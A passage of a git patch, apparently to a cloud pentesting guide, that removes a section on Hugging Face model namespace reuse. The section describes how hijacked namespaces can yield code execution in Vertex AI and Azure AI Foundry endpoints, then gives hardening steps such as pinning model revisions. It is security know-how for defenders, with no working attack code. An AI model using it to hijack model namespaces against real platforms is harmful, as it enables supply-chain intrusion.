AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code. - -{{#ref}} -gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md -{{#endref}} - -- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoint’s permissions. - -{{#ref}} -azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md -{{#endref}} - -Detection and hardening: -- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership. -- Pin to a specific commit in loaders to prevent silent replacement: - -```python -from transformers import AutoModel -m = AutoModel.from_pretrained("Author/ModelName", revision="") -``` - -- Clone vetted models to trusted internal registries/artifact stores and reference those in production. -- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered. - ## Google ### GCP From fc5e23269cd3f829b7b0c3aa1b3f117070009be4 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Mon, 29 Sep 2025 23:03:41 +0200 Subject: [PATCH 4/4] Update pentesting-cloud-methodology.md --- src/pentesting-cloud/pentesting-cloud-methodology.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index 41fce1f4c..bc79cb2d3 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -454,11 +454,6 @@ azure-security/ You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. -## References - -- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) -- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) -- [Transformers docs: Security and remote code](https://huggingface.co/docs/transformers/installation#security-and-remote-code) {{#include ../banners/hacktricks-training.md}}